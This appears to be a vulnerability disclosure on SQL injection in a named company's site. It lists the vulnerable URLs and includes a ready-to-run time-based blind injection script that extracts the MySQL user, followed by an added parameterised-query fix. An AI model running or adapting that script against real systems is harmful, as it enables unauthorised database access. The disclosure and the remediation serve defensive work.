SQL injection vulnerability exists in multiple sites of Chengdu yichuang WWW (package submission/script)
Multiple SQL Injection Vulnerabilities in Chengdu yichuang WWW Main Site
The Chengdu yichuang WWW main site has multiple SQL injection vulnerabilities, submitted together here. Vulnerable URLs:
http://www.kf5.com/resources/index?id=2
http://www.kf5.com/resources/view/id/60/
http://www.kf5.com/resources/index/id/2
http://www.kf5.com/resources/view?id=60/
... Maybe there are other places...
First, the request returns an error.
This essentially confirms that the injection exists. However, the server appears to be behind a firewall, so sqlmap is of no use.
First, manually determine that the length of the user name is 16.
Then run the script to extract the user name.
Script:
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
import math

headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print 'Start to retrive MySQL User:'
user = ''
for i in range(1, 17):
    for payload in payloads:
        s = "/resources/view?id=if(now()=sysdate(),SLEEP(IF(ascii(mid(user(),%s,1))=%s,10,0)),0)" % (i, ord(payload))
        conn = httplib.HTTPConnection('www.kf5.com', timeout=150)
        conn.request(method='GET', url=s, headers=headers)
        start_time = time.time()
        conn.getresponse()
        conn.close()
        print '.',
        if time.time() - start_time > 10.0:
            user += payload
            print '\n\n[in progress]', user,
            break
print '\n\n[Done] MySQL User is %s' % user
Solution:
Filter
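One way to apply the "Filter" fix to the id parameter, as an added example that is not code from the original report or from the affected site: allow-list the id as digits for both URL styles listed above, then bind it as a query parameter. Assumptions: sqlite3 stands in for the site's MySQL database, and the resources table, its rows, the function names and the app.example host are constructed.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

ID_RE = re.compile(r"[0-9]{1,9}")  # digits only, bounded length


def make_db():
    """Constructed stand-in table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE resources (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO resources VALUES (?, ?)",
                   [(2, "index"), (60, "article")])
    return db


def extract_id(url):
    """Return the raw id from either URL style: ?id=N or /id/N/."""
    parts = urlsplit(url)
    values = parse_qs(parts.query, keep_blank_values=True).get("id")
    if values is not None:
        # A repeated id parameter is ambiguous, so treat it as invalid.
        return values[0] if len(values) == 1 else ""
    match = re.search(r"/id/([^/]*)", parts.path)
    return match.group(1) if match else None


def fetch_resource(db, url):
    """Validate the id, then bind it; it is never formatted into the SQL text."""
    raw = extract_id(url)
    if raw is None or not ID_RE.fullmatch(raw):
        return None  # caller should answer 400 and log the rejected request
    row = db.execute("SELECT title FROM resources WHERE id = ?",
                     (int(raw),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    probe = ("http://app.example/resources/view?id="
             "if(now()=sysdate(),SLEEP(IF(ascii(mid(user(),1,1))=97,10,0)),0)")
    for url in ("http://app.example/resources/view/id/60/", probe):
        print(url, "->", fetch_resource(db, url))
```

With this check the SLEEP-based probe never reaches the database, so response time no longer depends on the injected condition.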